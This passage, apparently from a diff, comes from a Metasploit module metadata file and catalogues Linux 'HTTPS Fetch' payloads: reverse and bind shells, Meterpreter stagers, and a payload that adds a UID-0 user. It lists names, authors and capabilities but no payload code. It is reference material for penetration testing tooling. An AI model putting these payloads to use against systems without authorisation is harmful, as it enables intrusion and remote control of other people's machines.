"check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/pingback_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/x64/shell/bind_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Stager", - "fullname": "payload/cmd/linux/https/x64/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/shell/bind_tcp", - "staged": true, - "stage_refname": "linux/x64/shell", - "stager_refname": "linux/x64/bind_tcp" - }, - "payload_cmd/linux/https/x64/shell/reverse_sctp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse SCTP Stager", - "fullname": "payload/cmd/linux/https/x64/shell/reverse_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky", - "RageLtMan " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/shell/reverse_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/shell/reverse_sctp", - "staged": true, - "stage_refname": "linux/x64/shell", - "stager_refname": "linux/x64/reverse_sctp" - }, - "payload_cmd/linux/https/x64/shell/reverse_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/x64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky", - "tkmru" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/x64/shell", - "stager_refname": "linux/x64/reverse_tcp" - }, - "payload_cmd/linux/https/x64/shell_bind_ipv6_tcp": { - "name": "HTTPS Fetch, Linux x64 Command Shell, Bind TCP Inline (IPv6)", - "fullname": "payload/cmd/linux/https/x64/shell_bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "epi " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/shell_bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/shell_bind_ipv6_tcp", - "staged": false - }, - "payload_cmd/linux/https/x64/shell_bind_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/https/x64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/https/x64/shell_bind_tcp_random_port": { - "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Random Port Inline", - "fullname": "payload/cmd/linux/https/x64/shell_bind_tcp_random_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Geyslan G. Bem " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", - "references": [ - "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/shell_bind_tcp_random_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/shell_bind_tcp_random_port", - "staged": false - }, - "payload_cmd/linux/https/x64/shell_find_port": { - "name": "HTTPS Fetch, Linux Command Shell, Find Port Inline", - "fullname": "payload/cmd/linux/https/x64/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "mak" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/shell_find_port", - "staged": false - }, - "payload_cmd/linux/https/x64/shell_reverse_ipv6_tcp": { - "name": "HTTPS Fetch, Linux x64 Command Shell, Reverse TCP Inline (IPv6)", - "fullname": "payload/cmd/linux/https/x64/shell_reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "epi " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell over IPv6", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/shell_reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/shell_reverse_ipv6_tcp", - "staged": false - }, - "payload_cmd/linux/https/x64/shell_reverse_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/https/x64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/x86/adduser": { - "name": "HTTPS Fetch, Linux Add User", - "fullname": "payload/cmd/linux/https/x86/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "vlad902 ", - "spoonm " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nCreate a new user with UID 0", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/adduser", - "staged": false - }, - "payload_cmd/linux/https/x86/chmod": { - "name": "HTTPS Fetch, Linux Chmod", - "fullname": "payload/cmd/linux/https/x86/chmod", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "kris katterjohn " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nRuns chmod on specified file with specified mode", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/chmod", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/chmod", - "staged": false - }, - "payload_cmd/linux/https/x86/exec": { - "name": "HTTPS Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/https/x86/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "vlad902 ", - "Geyslan G. Bem " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nExecute an arbitrary command or just a /bin/sh shell", - "references": [ - "URL-https://github.com/geyslan/SLAE/blob/master/4th.assignment/tiny_execve_sh.asm", - "URL-https://github.com/geyslan/SLAE/blob/master/improvements/x86_execve_dyn.asm" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/exec", - "staged": false - }, - "payload_cmd/linux/https/x86/generic/debug_trap": { - "name": "HTTPS Fetch, Generic x86 Debug Trap", - "fullname": "payload/cmd/linux/https/x86/generic/debug_trap", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "robert " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nGenerate a debug trap in the target process", - "references": [], - "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/generic/debug_trap", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "generic/debug_trap", - "staged": false - }, - "payload_cmd/linux/https/x86/generic/tight_loop": { - "name": "HTTPS Fetch, Generic x86 Tight Loop", - "fullname": "payload/cmd/linux/https/x86/generic/tight_loop", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "jduck " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nGenerate a tight loop in the target process", - "references": [], - "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/generic/tight_loop", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "generic/tight_loop", - "staged": false - }, - "payload_cmd/linux/https/x86/meterpreter/bind_ipv6_tcp": { - "name": "HTTPS Fetch, Bind IPv6 TCP Stager (Linux x86)", - "fullname": "payload/cmd/linux/https/x86/meterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "kris katterjohn ", - "egypt " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for an IPv6 connection (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter/bind_ipv6_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_ipv6_tcp" - }, - "payload_cmd/linux/https/x86/meterpreter/bind_ipv6_tcp_uuid": { - "name": "HTTPS Fetch, Bind IPv6 TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/cmd/linux/https/x86/meterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "kris katterjohn ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for an IPv6 connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" - }, - "payload_cmd/linux/https/x86/meterpreter/bind_nonx_tcp": { - "name": "HTTPS Fetch, Bind TCP Stager", - "fullname": "payload/cmd/linux/https/x86/meterpreter/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for a connection", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter/bind_nonx_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_nonx_tcp" - }, - "payload_cmd/linux/https/x86/meterpreter/bind_tcp": { - "name": "HTTPS Fetch, Bind TCP Stager (Linux x86)", - "fullname": "payload/cmd/linux/https/x86/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape ", - "egypt " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for a connection (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_tcp" - }, - "payload_cmd/linux/https/x86/meterpreter/bind_tcp_uuid": { - "name": "HTTPS Fetch, Bind TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/cmd/linux/https/x86/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for a connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter/bind_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_tcp_uuid" - }, - "payload_cmd/linux/https/x86/meterpreter/find_tag": { - "name": "HTTPS Fetch, Find Tag Stager", - "fullname": "payload/cmd/linux/https/x86/meterpreter/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nUse an established connection", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter/find_tag", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/find_tag" - }, - "payload_cmd/linux/https/x86/meterpreter/reverse_ipv6_tcp": { - "name": "HTTPS Fetch, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/linux/https/x86/meterpreter/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "kris katterjohn " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nConnect back to attacker over IPv6", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_ipv6_tcp" - }, - "payload_cmd/linux/https/x86/meterpreter/reverse_nonx_tcp": { - "name": "HTTPS Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/x86/meterpreter/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter/reverse_nonx_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_nonx_tcp" - }, - "payload_cmd/linux/https/x86/meterpreter/reverse_tcp": { - "name": "HTTPS Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/x86/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape ", - "egypt ", - "tkmru" - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_tcp" - }, - "payload_cmd/linux/https/x86/meterpreter/reverse_tcp_uuid": { - "name": "HTTPS Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/x86/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter/reverse_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_tcp_uuid" - }, - "payload_cmd/linux/https/x86/meterpreter_reverse_http": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/x86/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/https/x86/meterpreter_reverse_https": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/x86/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/https/x86/meterpreter_reverse_tcp": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/x86/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/x86/metsvc_bind_tcp": { - "name": "HTTPS Fetch, Linux Meterpreter Service, Bind TCP", - "fullname": "payload/cmd/linux/https/x86/metsvc_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "hdm " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nStub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/metsvc_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - 